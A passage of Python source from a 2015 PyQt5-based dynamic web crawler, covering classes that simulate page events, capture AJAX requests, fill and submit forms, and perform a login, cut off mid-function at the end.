 46 |                                  'resize', 'scroll', 'select', 'submit', 'load', 'unload', 'mouseleave']
 47 |         self.key_events = ['keyup', 'keydown', 'keypress']
 48 |         self.supported_events = self.none_key_events + self.key_events
 49 | 
 50 |         self.seen_timeouts = {}
 51 |         self.popup = None # reference if a popup occurs...
 52 |         self.mainFrame().urlChanged.connect(self._url_changes)
 53 | 
 54 |     def execute(self, webpage, timeout=5, element_to_click=None, xhr_options=XHRBehavior.ObserveXHR, pre_clicks=[]):
 55 |         logging.debug(
 56 |             "EventExecutor test started on {}...".format(webpage.url) + " with " + element_to_click.toString())
 57 |         self._analyzing_finished = False
 58 |         self._loading_complete = False
 59 |         self.xhr_options = xhr_options
 60 |         self.element_to_click = None
 61 |         self.ajax_requests = []
 62 |         self._new_url = None
 63 |         self.timeming_events = None
 64 |         self._capturing_ajax = False
 65 |         self._new_clickables = []
 66 |         self.element_to_click = element_to_click
 67 |         self.popup = None
 68 |         self.mainFrame().setHtml(webpage.html, QUrl(webpage.url))
 69 |         target_tag = element_to_click.dom_address.split("/")
 70 |         target_tag = target_tag[-1]
 71 |         if target_tag in ['video']:
 72 |             return EventResult.UnsupportedTag, None
 73 | 
 74 |         t = 0.0
 75 |         while (not self._loading_complete and t < timeout ):  # Waiting for finish processing
 76 |             self._wait(0.1)
 77 |             t += 0.1
 78 |         if not self._loading_complete:
 79 |             logging.debug("Timeout occurs while initial page loading...")
 80 |             return EventResult.ErrorWhileInitialLoading, None
 81 |         # Prepare Page for clicking...
 82 |         self._wait(0.1)
 83 |         for click in pre_clicks:
 84 |             pre_click_elem = None
 85 |             logging.debug("Click on: " + click.toString())
 86 |             if click.id != None and click.id != "":
 87 |                 pre_click_elem = self.search_element_with_id(click.id)
 88 |             if click.html_class != None and pre_click_elem == None:
 89 |                 pre_click_elem = self.search_element_with_class(click.html_class, click.dom_address)
 90 |             if pre_click_elem == None:
 91 |                 pre_click_elem = self.search_element_without_id_and_class(click.dom_address)
 92 | 
 93 |             if pre_click_elem is None:
 94 |                 logging.debug("Preclicking element not found")
 95 |                 return EventResult.PreviousClickNotFound, None
 96 | 
 97 |             if "javascript:" not in click.event:
 98 |                 js_code = click.event
 99 |                 if js_code[0:2] == "on":
100 |                     js_code = js_code[2:]  # if event beginns with on, escape it
101 |                 js_code = "Simulate." + js_code + "(this);"
102 |                 pre_click_elem.evaluateJavaScript(js_code)  # Waiting for finish processing
103 |             else:
104 |                 pre_click_elem.evaluateJavaScript(click.event[len("javascript:"):])
105 |             self._wait(self.wait_for_event)
106 | 
107 |         is_key_event = False
108 |             # Now execute the target event
109 |         if "javascript:" not in element_to_click.event:
110 |             self._url_changed = False
111 |             js_code = element_to_click.event
112 |             if js_code[0:2] == "on":
113 |                 js_code = js_code[2:]  # if event begins with on, escape it
114 | 
115 |             if js_code in self.key_events:
116 |                 is_key_event = True
117 |                 random_char = random.choice(string.ascii_letters)
118 |                 js_code = "Simulate." + js_code + "(this, '" + random_char + "');"
119 |             else:
120 |                 js_code = "Simulate." + js_code + "(this);"
121 |         else:
122 |             js_code = element_to_click.event[len("javascript:"):]
123 | 
124 |         self.mainFrame().evaluateJavaScript(
125 |             self._addEventListener)  # This time it is here, because I dont want to have the initial addings
126 | 
127 |         real_clickable = None
128 |         if element_to_click.id != None and element_to_click.id != "":
129 |             real_clickable = self.search_element_with_id(element_to_click.id)
130 |         if element_to_click.html_class != None and real_clickable == None:
131 |             real_clickable = self.search_element_with_class(element_to_click.html_class, element_to_click.dom_address)
132 |         if real_clickable == None:
133 |             real_clickable = self.search_element_without_id_and_class(element_to_click.dom_address)
134 | 
135 |         if real_clickable is None:
136 |             logging.debug("Target Clickable not found")
137 |             return EventResult.TargetElementNotFound, None
138 | 
139 |         self._capturing_ajax = True
140 |         real_clickable.evaluateJavaScript(js_code)
141 |         self._wait(0.5)
142 |         self._capturing_ajax = False
143 |         links, clickables = extract_links(self.mainFrame(), webpage.url)
144 | 
145 |         forms = extract_forms(self.mainFrame())
146 |         elements_with_event_properties = property_helper(self.mainFrame())
147 |         self.mainFrame().evaluateJavaScript(self._property_obs_js)
148 |         self._wait(0.1)
149 | 
150 |         html = self.mainFrame().toHtml()
151 |         url = self.mainFrame().url().toString()
152 | 
153 |         if is_key_event:
154 |             generator = KeyClickable(element_to_click, random_char)
155 |         else:
156 |             generator = element_to_click
157 |         if self._url_changed and self._new_url.toString() != webpage.url:
158 |             delta_page = DeltaPage(-1, self._new_url.toString(), html=None, generator=generator, parent_id=webpage.id,
159 |                                    cookiesjar=webpage.cookiejar)
160 |             self._analyzing_finished = True
161 |             self.mainFrame().setHtml(None)
162 |             return EventResult.URLChanged, delta_page
163 |         elif self.popup is not None:
164 |             logging.debug("Event creates Popup with Url: {}".format(self.popup.mainFrame().url().toString()))
165 |             popup_url = self.popup.mainFrame().url().toString()
166 |             delta_page = DeltaPage(-1, popup_url, html=None, generator=generator, parent_id=webpage.id)
167 |             self.popup = None
168 |             self._analyzing_finished = True
169 |             self.mainFrame().setHtml(None)
170 |             return EventResult.CreatesPopup, delta_page
171 |         else:
172 |             delta_page = DeltaPage(-1, webpage.url, html, generator=generator, parent_id=webpage.id,
173 |                                    cookiesjar=webpage.cookiejar)
174 |             delta_page.clickables = self._new_clickables  # Set by add eventlistener code
175 |             delta_page.clickables.extend(clickables)
176 |             delta_page.clickables.extend(elements_with_event_properties)
177 |             delta_page.clickables = purge_dublicates(delta_page.clickables)
178 |             try:
179 |                 delta_page.clickables.remove(self.element_to_click) # remove the clickable self...
180 |             except ValueError:
181 |                 pass
182 |             delta_page.links = links
183 |             delta_page.forms = forms
184 |             delta_page.ajax_requests = self.ajax_requests
185 |             self._analyzing_finished = True
186 |             self.mainFrame().setHtml(None)
187 |             return EventResult.Ok, delta_page
188 | 
189 |     def javaScriptAlert(self, frame, msg):
190 |         logging.debug("Alert occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg))
191 | 
192 |     def javaScriptConfirm(self, frame, msg):
193 |         logging.debug("Confirm occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg))
194 |         return True
195 | 
196 |     def loadFinishedHandler(self, result):
197 |         if not self._analyzing_finished:  # Just to ignoring setting of non page....
198 |             self._loading_complete = True
199 | 
200 |     def jsWinObjClearedHandler(self):  # Adding here the js-scripts corresponding to the phases
201 |         if not self._analyzing_finished:
202 |             self.mainFrame().evaluateJavaScript(self._lib_js)
203 |             self.mainFrame().evaluateJavaScript(self._md5)
204 |             self.mainFrame().addToJavaScriptWindowObject("jswrapper", self._js_bridge)
205 |             if self.xhr_options == XHRBehavior.ObserveXHR:
206 |                 self.mainFrame().evaluateJavaScript(self._xhr_observe_js)
207 |             if self.xhr_options == XHRBehavior.InterceptXHR:
208 |                 self.mainFrame().evaluateJavaScript(self._xhr_interception_js)
209 | 
210 |     def createWindow(self, win_type):
211 |         logging.debug("Creating new window...{}".format(win_type))
212 | 
213 |     def capturing_requests(self, request):
214 |         if self._capturing_ajax:
215 |             logging.debug("Ajax to: {} captured...".format(request['url']))
216 |             ajax_request = AjaxRequest(request['method'], request['url'], self.element_to_click, request['parameters'])
217 |             if ajax_request not in self.ajax_requests:
218 |                 self.ajax_requests.append(ajax_request)
219 | 
220 |     def javaScriptConsoleMessage(self, message, lineNumber, sourceID):
221 |         logging.debug("Console(EventExecutor): " + message + " at: " + str(lineNumber))
222 |         pass
223 | 
224 |     def capture_timeout_call(self, timingevent):
225 |         try:
226 |             # logging.debug(timingevent)
227 |             if timingevent['time'] != "undefined":
228 |                 time = timingevent['time']  # millisecond
229 |                 event_type = timingevent['type']
230 |                 event_id = timingevent['function_id']
231 |                 if self.timeming_events is not None:
232 |                     if time > self.timeming_events[0]:
233 |                         self.timeming_events = (time, event_type, event_id)
234 |                 else:
235 |                     self.timeming_events = (time, event_type, event_id)
236 |         except KeyError as err:
237 |             logging.debug("Key error occurred in Events " + str(err))
238 | 
239 | 
240 |     def _url_changes(self, url):
241 |         self._url_changed = True
242 |         self._new_url = url
243 | 
244 |     def createWindow(self, webWindowType):
245 |         self.popup = QWebPage()
246 |         return self.popup
247 | 
248 | 
249 | class EventResult(Enum):
250 |     Ok = 0
251 |     PreviousClickNotFound = 1
252 |     TargetElementNotFound = 2
253 |     ErrorWhileInitialLoading = 3
254 |     URLChanged = 4
255 |     UnsupportedTag = 5
256 |     CreatesPopup = 6
257 | 


--------------------------------------------------------------------------------
/crawler/core/formhandler.py:
--------------------------------------------------------------------------------
  1 | '''
  2 | Copyright (C) 2015 Constantin Tschuertz
  3 | 
  4 | This program is free software: you can redistribute it and/or modify
  5 | it under the terms of the GNU General Public License as published by
  6 | the Free Software Foundation, either version 3 of the License, or
  7 | any later version.
  8 | 
  9 | This program is distributed in the hope that it will be useful,
 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 12 | GNU General Public License for more details.
 13 | 
 14 | You should have received a copy of the GNU General Public License
 15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
 16 | '''
 17 | 
 18 | import logging
 19 | 
 20 | from PyQt5.Qt import QUrl
 21 | 
 22 | from core.interactioncore import InteractionCore
 23 | from core.eventexecutor import EventResult
 24 | from analyzer.helper.formhelper import extract_forms
 25 | from analyzer.helper.linkhelper import extract_links
 26 | from models.clickable import Clickable
 27 | from models.utils import CrawlSpeed, purge_dublicates
 28 | 
 29 | __author__ = 'constantin'
 30 | 
 31 | 
 32 | class FormHandler(InteractionCore):
 33 | 
 34 | 
 35 |     def __init__(self, parent, proxy = "", port = 0, crawl_speed = CrawlSpeed.Medium, network_access_manager = None):
 36 |         super(FormHandler, self).__init__(parent, proxy, port, crawl_speed, network_access_manager)
 37 |         #self.mainFrame().urlChanged.connect(self._url_changes)
 38 | 
 39 |     def submit_form(self, form, webpage, data=dict(), timeout=5):
 40 |         logging.debug("FormHandler on Page: {} started...".format(webpage.url))
 41 |         self._loading_complete = False
 42 |         self._analyzing_finished = False
 43 |         try:
 44 |             url = webpage.url.toString()
 45 |         except AttributeError:
 46 |             url = webpage.url
 47 |         self.mainFrame().setHtml(webpage.html, QUrl(url))
 48 |         self._new_clickables = []
 49 | 
 50 |         t = 0.0
 51 |         while not self._loading_complete and t < timeout: # Waiting for finish processing
 52 |             self._wait(0.1)
 53 |             t += 0.1
 54 |         if not self._loading_complete:
 55 |             logging.debug("Timeout occurs while initial page loading...")
 56 |             return EventResult.ErrorWhileInitialLoading, None
 57 | 
 58 |         target_form = None
 59 |         p_forms = self.mainFrame().findAllElements("form")
 60 |         for tmp_form in p_forms:
 61 |             path = tmp_form.evaluateJavaScript("getXPath(this)")
 62 |             if path == form.dom_address:
 63 |                 target_form = tmp_form
 64 |                 break
 65 |         if target_form is None:
 66 |             return EventResult.TargetElementNotFound, None
 67 | 
 68 |         for elem in form.parameter: #Iterate through abstract form representation
 69 |             if elem.name in data: #Check if we have the data we must set
 70 |                 elem_found = False # Indicates if we found the element in the html
 71 |                 value_to_set = data[elem.name]
 72 |                 for tmp in target_form.findAll(elem.tag): #Locking in the target form, if we found the element we have to set
 73 |                     if tmp.attribute("name") == elem.name: # Has the current element in the html the same name as our data
 74 |                         tmp.evaluateJavaScript("this.value = '" + value_to_set + "';")
 75 |                         elem_found = True
 76 |                         break
 77 |                 if not elem_found:
 78 |                     return EventResult.TargetElementNotFound, None
 79 |         # Now we should have set all known parameters, next click the submit button
 80 |         q_submit_button = None
 81 |         if "submit" in form.toString():
 82 |             inputs = target_form.findAll("input") + target_form.findAll("button")
 83 |             for el in inputs:
 84 |                 if el.attribute("type") == "submit":
 85 |                     q_submit_button = el
 86 |                     break
 87 |             #q_submit_button.evaluateJavaScript("this.id='oxyfrymbel'")
 88 |         else:
 89 |             logging.debug(form.toString())
 90 | 
 91 |         if q_submit_button is None:
 92 |             inputs = target_form.findAll("button")
 93 |             q_submit_button = None
 94 |             if len(inputs) > 1:
 95 |                 logging.debug("Cannot locate login button...")
 96 |                 return EventResult.TargetElementNotFound, None
 97 |             elif len(inputs) == 1:
 98 |                 q_submit_button = inputs[0]
 99 | 
100 |         method = target_form.attribute("onsubmit")
101 |         if method is not None and method != "":
102 |             js_code_snippets = method.split(";")
103 |             for snippet in js_code_snippets:
104 |                 if "return" in snippet or snippet == "":
105 |                     logging.debug("Ignoring snippet: {}".format(snippet))
106 |                     continue
107 |                 logging.debug("Eval: {}".format(snippet+";"))
108 |                 self.mainFrame().evaluateJavaScript(snippet+";")
109 |                 self._wait(3)
110 |             self.mainFrame().evaluateJavaScript(self._addEventListener)
111 |             self._wait(3)
112 |         else:
113 |             #TODO: Implement way for sending forms without onsubmit-method
114 |             # check between: target_form.evaluateJavaScript("Simulate or document.?form?.submit())
115 |             # or submit_button click
116 |             if q_submit_button is not None:
117 |                 logging.debug("Click on submit button...")
118 |                 q_submit_button.evaluateJavaScript("Simulate.click(this);")
119 |                 self._wait(3)
120 |             else:
121 |                 logging.debug("Trigger submit event on form...")
122 |                 target_form.evaluateJavaScript("Simulate.submit(this);")
123 |                 self._wait(3)
124 | 
125 |         links, clickables = extract_links(self.mainFrame(), url)
126 |         forms = extract_forms(self.mainFrame())
127 |         html = self.mainFrame().toHtml()
128 |         #f = open("html.txt", "w")
129 |         #f.write(html)
130 |         #f.close()
131 |         self.mainFrame().setHtml(None)
132 |         self._new_clickables.extend(clickables)
133 |         self._new_clickables = purge_dublicates(self._new_clickables)
134 |         return EventResult.Ok, html, self._new_clickables, forms, links, []
135 | 
136 |     def jsWinObjClearedHandler(self): #Adding here the js-scripts corresponding to the phases
137 |         if not self._analyzing_finished:
138 |             self.mainFrame().evaluateJavaScript(self._lib_js)
139 |             self.mainFrame().evaluateJavaScript(self._md5)
140 |             self.mainFrame().addToJavaScriptWindowObject("jswrapper", self._js_bridge)
141 | 
142 |     def javaScriptConsoleMessage(self, message, lineNumber, sourceID):
143 |         #logging.debug("Console(FormHandler): " + message + " at: " + str(lineNumber))
144 |         pass
145 | 
146 |     def javaScriptAlert(self, frame, msg):
147 |         logging.debug("Alert occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg))
148 | 
149 |     def javaScriptConfirm(self, frame, msg):
150 |         logging.debug("Confirm occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg))
151 |         return True
152 | 
153 |     def loadFinishedHandler(self, result):
154 |         if not self._analyzing_finished: # Just to ignoring setting of non page....
155 |             self._loading_complete = True
156 | 


--------------------------------------------------------------------------------
/crawler/core/interactioncore.py:
--------------------------------------------------------------------------------
  1 | '''
  2 | Copyright (C) 2015 Constantin Tschuertz
  3 | 
  4 | This program is free software: you can redistribute it and/or modify
  5 | it under the terms of the GNU General Public License as published by
  6 | the Free Software Foundation, either version 3 of the License, or
  7 | any later version.
  8 | 
  9 | This program is distributed in the hope that it will be useful,
 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 12 | GNU General Public License for more details.
 13 | 
 14 | You should have received a copy of the GNU General Public License
 15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
 16 | '''
 17 | 
 18 | 
 19 | from PyQt5.Qt import QWebPage, QWebSettings
 20 | from PyQt5.QtNetwork import QNetworkProxy, QNetworkRequest
 21 | from PyQt5.QtCore import QSize, QUrl, QByteArray
 22 | 
 23 | from time import time, sleep
 24 | from core.jsbridge import JsBridge
 25 | from models.clickable import Clickable
 26 | from models.utils import CrawlSpeed
 27 | import logging
 28 | 
 29 | class InteractionCore(QWebPage):
 30 |     '''
 31 |     This is the main class for interacting with a webpage, here are all necessary js-files loaded, and signal connections build
 32 |     '''    
 33 |     def __init__(self, parent, proxy = "", port = 0, crawl_speed = CrawlSpeed.Medium, network_access_manager = None):
 34 |         QWebPage.__init__(self, parent)
 35 |         self.app = parent.app
 36 |         self._js_bridge = JsBridge(self)
 37 |         self.loadFinished.connect(self.loadFinishedHandler)
 38 |         self.mainFrame().javaScriptWindowObjectCleared.connect(self.jsWinObjClearedHandler)
 39 |         self.frameCreated.connect(self.frameCreatedHandler)
 40 |         self.setViewportSize(QSize(1024, 800))
 41 | 
 42 |         if crawl_speed == CrawlSpeed.Slow:
 43 |             self.wait_for_processing = 1
 44 |             self.wait_for_event = 2
 45 |         if crawl_speed == CrawlSpeed.Medium:
 46 |             self.wait_for_processing = 0.3
 47 |             self.wait_for_event = 1
 48 |         if crawl_speed == CrawlSpeed.Fast:
 49 |             self.wait_for_processing = 0.1
 50 |             self.wait_for_event = 0.5
 51 |         if crawl_speed == CrawlSpeed.Speed_of_Lightning:
 52 |             self.wait_for_processing = 0.01
 53 |             self.wait_for_event = 0.1
 54 |         
 55 |         f = open("js/lib.js", "r")
 56 |         self._lib_js = f.read()
 57 |         f.close()
 58 |         
 59 |         f = open("js/ajax_observer.js")
 60 |         self._xhr_observe_js = f.read()
 61 |         f.close()
 62 |         
 63 |         f = open("js/timing_wrapper.js")
 64 |         self._timeming_wrapper_js = f.read()
 65 |         f.close()
 66 |         
 67 |         
 68 |         f = open("js/ajax_interceptor.js")
 69 |         self._xhr_interception_js = f.read()
 70 |         f.close()
 71 |         
 72 |         f = open("js/addeventlistener_wrapper.js")
 73 |         self._addEventListener = f.read()
 74 |         f.close()
 75 |         
 76 |         f = open("js/md5.js")
 77 |         self._md5 = f.read()
 78 |         f.close()
 79 | 
 80 |         f = open("js/property_obs.js")
 81 |         self._property_obs_js = f.read()
 82 |         f.close()
 83 | 
 84 |         enablePlugins = True
 85 |         loadImages = False
 86 |         self.settings().setAttribute(QWebSettings.PluginsEnabled, enablePlugins)
 87 |         self.settings().setAttribute(QWebSettings.JavaEnabled, enablePlugins)
 88 |         #self.settings().setAttribute(QWebSettings.AutoLoadImages, loadImages)
 89 |         self.settings().setAttribute(QWebSettings.DeveloperExtrasEnabled, True)
 90 |         self.settings().setAttribute(QWebSettings.JavascriptEnabled, True)
 91 |         self.settings().setAttribute(QWebSettings.JavascriptCanOpenWindows, True)
 92 |         
 93 |         if network_access_manager:
 94 |             self.setNetworkAccessManager(network_access_manager)
 95 |         
 96 |         if proxy != "" and port != 0: 
 97 |             manager = self.networkAccessManager()
 98 |             p = QNetworkProxy(QNetworkProxy.HttpProxy, proxy, port, None, None)
 99 |             manager.setProxy(p)
100 |             self.setNetworkAccessManager(manager)
101 | 
102 |         #Have to connect it here, otherwise I could connect it to the old one and then replaces it
103 |         self.networkAccessManager().finished.connect(self.loadComplete)
104 | 
105 |     def analyze(self, html, requested_url, timeout = 20):
106 |         raise NotImplemented()
107 |     
108 |     def userAgentForUrl(self, url):
109 |         return "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
110 |     
111 |     def loadFinishedHandler(self, result):
112 |         pass
113 |     
114 |     def frameCreatedHandler(self, frame):
115 |         pass
116 |     
117 |     def jsWinObjClearedHandler(self):
118 |         pass
119 | 
120 |     def javaScriptAlert(self, frame, msg):
121 |         pass
122 | 
123 |     def javaScriptConfirm(self, frame, msg):
124 |         return True
125 |     
126 |     def javaScriptPrompt(self, *args, **kwargs):
127 |         return True
128 |             
129 |     def _wait(self, waiting_time=1):
130 |         """Wait for delay time
131 |         """
132 |         deadline = time() + waiting_time
133 |         while time() < deadline:
134 |             sleep(0)
135 |             self.app.processEvents()
136 |             
137 |     def javaScriptConsoleMessage(self, message, lineNumber, sourceID):
138 |         #logging.debug("Console: " + message + " at: " + str(lineNumber))
139 |         pass
140 | 
141 |     def loadComplete(self, reply):
142 |         pass
143 | 
144 |     def add_eventlistener_to_element(self, msg):
145 |         #logging.debug(msg)
146 |         if "id" in msg and msg['id'] != "":
147 |             id = msg['id']
148 |         else:
149 |             id = None
150 |         dom_address = msg['addr']
151 |         event = msg['event']
152 |         if event == "":
153 |             event = None
154 |         tag = msg['tag']
155 |         if "class" in msg and msg['class'] != "":
156 |             html_class = msg['class']
157 |         else:
158 |             html_class = None
159 |         function_id = msg['function_id']
160 |         if tag is not None and dom_address != "":
161 |             tmp = Clickable(event, tag, dom_address, id, html_class, function_id=function_id)
162 |             if tmp not in self._new_clickables:
163 |                 self._new_clickables.append(tmp)
164 | 
165 | 
166 |     def search_element_with_id(self, element_id):
167 |         elem = self.mainFrame().findAllElements("#" + str(element_id))
168 |         if len(elem) > 0:
169 |             return elem[0] # maybe check if there is more than one element
170 |         else:
171 |             return None
172 | 
173 |     def search_element_with_class(self, cls, dom_adress):
174 |         css_cls_definition = ""
175 |         classes = cls.split(" ")
176 |         for cls in classes: #converting class names in css-compatible classnames
177 |             cls = "." + cls
178 |             css_cls_definition = css_cls_definition + cls + " "
179 |         elems = self.mainFrame().findAllElements(css_cls_definition)
180 |         for elem in elems:
181 |             if dom_adress == elem.evaluateJavaScript("getXPath(this)"):
182 |                 return elem
183 | 
184 |     def search_element_without_id_and_class(self, dom_adress):
185 |         check_dom_adress = dom_adress
186 |         dom_address = dom_adress.split("/")
187 |         current_element_in_dom = self.mainFrame().documentElement() #Is HTML-Element
188 |         while len(dom_address) > 0 and current_element_in_dom is not None:
189 |             target_tag_name = dom_address.pop(0) # Get and remove the first element
190 |             target_tag_name = target_tag_name.upper()
191 |             if len(target_tag_name) == 0:
192 |                 continue
193 |             elif target_tag_name == "HTML": #or target_tag_name == "body":
194 |                 continue
195 |             else:
196 |                 tmp = target_tag_name.find("[")
197 |                 if tmp > 0: # target_tag_name looks like tagname[index]
198 |                     target_tag_name = target_tag_name.split("[")
199 |                     index = int(target_tag_name[1].split("]")[0]) # get index out of target_tag_name
200 |                     target_tag_name = target_tag_name[0] # target_tag_name name
201 |                     last_child = current_element_in_dom.lastChild()
202 |                     tmp_element = current_element_in_dom.findFirst(target_tag_name) # takes first child
203 |                     if tmp_element.tagName() == target_tag_name: # if firstchild is from type of target_tag_name, subtrakt 1 from index
204 |                         index -= 1;
205 |                     counter = 100 #Sometimes comparing with last child went wrong, therefore we have an backup fragment_counter
206 |                     while index > 0 and tmp_element != last_child: # take next sibbling until index is 0, if target_tag_name is equal subtrakt one
207 |                         tmp_element = tmp_element.nextSibling() #
208 |                         if tmp_element.tagName() == target_tag_name:
209 |                             index -= 1
210 |                         counter -= 1
211 |                         if counter == 0: #If fragment_counter 0 then break, we wont find it anymore
212 |                             current_element_in_dom = None
213 |                             break
214 |                     if index == 0 and tmp_element.tagName() == target_tag_name:
215 |                         current_element_in_dom = tmp_element
216 |                     else: #We miss the element
217 |                         current_element_in_dom = None
218 |                 else: #target_tag_name is the only of his type, or the first...is die hell
219 |                     tmp_element = current_element_in_dom.firstChild()
220 |                     last_child = current_element_in_dom.lastChild()
221 |                     counter = 100
222 |                     while tmp_element.tagName() != target_tag_name and tmp_element != last_child and counter > 0:
223 |                         #logging.debug(tmp_element.tagName())
224 |                         counter -= 1
225 |                         if tmp_element.tagName() == target_tag_name:
226 |                             current_element_in_dom = tmp_element
227 |                             break
228 |                         else:
229 |                             tmp_element = tmp_element.nextSibling()
230 |                     if tmp_element.tagName() != target_tag_name or counter == 0:
231 |                         current_element_in_dom = None
232 |                     else:
233 |                         current_element_in_dom = tmp_element
234 | 
235 |         tmp_element = None
236 |         last_child = None
237 |         dom_address = None
238 | 
239 |         if current_element_in_dom == None:
240 |             return None
241 |         if current_element_in_dom.evaluateJavaScript("getXPath(this)") != check_dom_adress:
242 |             logging.debug("Element not found: " + str(current_element_in_dom.evaluateJavaScript("getXPath(this)")) + " : " + str(check_dom_adress))
243 |             return None
244 |         else:
245 |             return current_element_in_dom
246 | 
247 | 
248 |     def make_request(self, url):
249 |         request = QNetworkRequest()
250 |         request.setUrl(QUrl(url))
251 |         return request
252 | 
253 |     def post_data_to_array(self, post_data):
254 |         post_params = QByteArray()
255 |         for (key, value) in post_data.items():
256 |             if isinstance(value, list):
257 |                 for val in value:
258 |                     post_params.append(key + "=" + val + "&")
259 |             else:
260 |                 post_params.append(key + "=" + value + "&")
261 |         post_params.remove(post_params.length() - 1, 1)
262 |         return post_params


--------------------------------------------------------------------------------
/crawler/core/jaekcore.py:
--------------------------------------------------------------------------------
  1 | '''
  2 | Copyright (C) 2015 Constantin Tschuertz
  3 | 
  4 | This program is free software: you can redistribute it and/or modify
  5 | it under the terms of the GNU General Public License as published by
  6 | the Free Software Foundation, either version 3 of the License, or
  7 | any later version.
  8 | 
  9 | This program is distributed in the hope that it will be useful,
 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 12 | GNU General Public License for more details.
 13 | 
 14 | You should have received a copy of the GNU General Public License
 15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
 16 | '''
 17 | 
 18 | from asyncio.tasks import sleep
 19 | import logging
 20 | from PyQt5.Qt import QApplication, QObject
 21 | from PyQt5.QtNetwork import QNetworkAccessManager
 22 | import sys
 23 | from copy import deepcopy
 24 | from analyzer.mainanalyzer import MainAnalyzer
 25 | from core.eventexecutor import EventResult, EventExecutor
 26 | from core.formhandler import FormHandler
 27 | from models.webpage import WebPage
 28 | from utils.asyncrequesthandler import AsyncRequestHandler
 29 | from utils.execptions import LoginFailed
 30 | from utils.utils import count_cookies, calculate_similarity_between_pages
 31 | 
 32 | __author__ = 'constantin'
 33 | 
 34 | class JaekCore(QObject):
 35 | 
 36 | 
 37 |     def __init__(self, config, proxy="", port=0, database_manager=None):
 38 |         QObject.__init__(self)
 39 |         self.app = QApplication(sys.argv)
 40 |         self._network_access_manager = QNetworkAccessManager(self)
 41 |         self.user = None
 42 |         self.proxy = proxy
 43 |         self.port = port
 44 |         self.config = config
 45 |         self.database_manager = database_manager
 46 |         self.domain_handler = None
 47 |         self.process_with_login = False
 48 |         self.async_request_handler = AsyncRequestHandler(self.database_manager)
 49 | 
 50 |         self._event_executor = EventExecutor(self, proxy, port, crawl_speed=config.process_speed,
 51 |                                              network_access_manager=self._network_access_manager)
 52 |         self._dynamic_analyzer = MainAnalyzer(self, proxy, port, crawl_speed=config.process_speed,
 53 |                                           network_access_manager=self._network_access_manager)
 54 |         self._form_handler = FormHandler(self, proxy, port, crawl_speed=config.process_speed,
 55 |                                              network_access_manager=self._network_access_manager)
 56 | 
 57 |         self.cookie_num = -1
 58 |         self.interactive_login_form_search = False
 59 | 
 60 |     def _find_form_with_special_parameters(self, page, login_data, interactive_search=True):
 61 |         keys = list(login_data.keys())
 62 |         data1 = keys[0]
 63 |         data2 = keys[1]
 64 |         for form in page.forms:
 65 |             if form.toString().find(data1) > -1 and form.toString().find(data2) > -1:
 66 |                 return form, None
 67 |         if interactive_search:
 68 |             for clickable in page.clickables:
 69 |                 tmp_page = deepcopy(page)
 70 |                 event_state, delta_page = self._event_executor.execute(tmp_page, element_to_click=clickable)
 71 |                 if delta_page is None:
 72 |                     sleep(2000)
 73 |                     event_state, delta_page = self._event_executor.execute(tmp_page, element_to_click=clickable)
 74 |                 if delta_page is None:
 75 |                     continue
 76 |                 delta_page = self.domain_handler.complete_urls_in_page(delta_page)
 77 |                 delta_page = self.domain_handler.analyze_urls(delta_page)
 78 |                 if event_state == EventResult.Ok:
 79 |                     for form in delta_page.forms:
 80 |                         if form.toString().find(data1) > -1 and form.toString().find(data2) > -1:
 81 |                             return form, clickable
 82 |         return None, None
 83 | 
 84 |     def _initial_login(self):
 85 |         logging.debug("Initial Login...")
 86 |         self._page_with_loginform_logged_out = self._get_webpage(self.user.url_with_login_form)
 87 |         num_of_cookies_before_login = count_cookies(self._network_access_manager, self.user.url_with_login_form)
 88 |         logging.debug("Number of cookies before initial login: {}".format(num_of_cookies_before_login))
 89 |         self._login_form, login_clickables = self._find_form_with_special_parameters(self._page_with_loginform_logged_out, self.user.login_data)
 90 |         if self._login_form is None:
 91 |             f = open("No_login_form.txt", "w")
 92 |             f.write(self._page_with_loginform_logged_out.html)
 93 |             f.close()
 94 |             raise LoginFailed("Cannot find Login form, please check the parameters...")
 95 | 
 96 |         page_after_login = self._login_and_return_webpage(self._login_form, self._page_with_loginform_logged_out, self.user.login_data, login_clickables)
 97 |         if page_after_login is None:
 98 |             raise LoginFailed("Cannot load loginpage anymore...stop...")
 99 |         login_successfull = calculate_similarity_between_pages(self._page_with_loginform_logged_out, page_after_login) < 0.5
100 |         if login_successfull:
101 |             num_cookies_after_login = count_cookies(self._network_access_manager, self.user.url_with_login_form)
102 |             if num_cookies_after_login > num_of_cookies_before_login:
103 |                 self.cookie_num = num_cookies_after_login
104 |             logging.debug("Initial login successfull!")
105 |             if login_clickables is not None:
106 |                 return True, True # If we login with a click
107 |             else:
108 |                 return True, False # If we don't login with a click
109 |         raise LoginFailed("Cannot login, sorry...")
110 | 
111 |     def _login_and_return_webpage(self, login_form, page_with_login_form=None, login_data=None, login_clickable= None):
112 |         if page_with_login_form is None:
113 |             page_with_login_form = self._page_with_loginform_logged_out
114 |         try:
115 |             if login_clickable is not None:
116 |                 tmp_page = deepcopy(page_with_login_form)
117 |                 event_state, page_with_login_form = self._event_executor.execute(tmp_page, element_to_click=login_clickable)
118 |                 if event_state == EventResult.ErrorWhileInitialLoading:
119 |                     sleep(2000)
120 |                     event_state, page_with_login_form = self._event_executor.execute(tmp_page, element_to_click=login_clickable)
121 |                     if event_state == EventResult.ErrorWhileInitialLoading:
122 |                         logging.debug("Two time executing fails.. stop crawling")
123 |                         return None
124 |                 self.domain_handler.complete_urls_in_page(page_with_login_form)
125 |                 self.domain_handler.analyze_urls(page_with_login_form)
126 |                 self.async_request_handler.handle_requests(page_with_login_form)
127 |             logging.debug("Start submitting login form...")
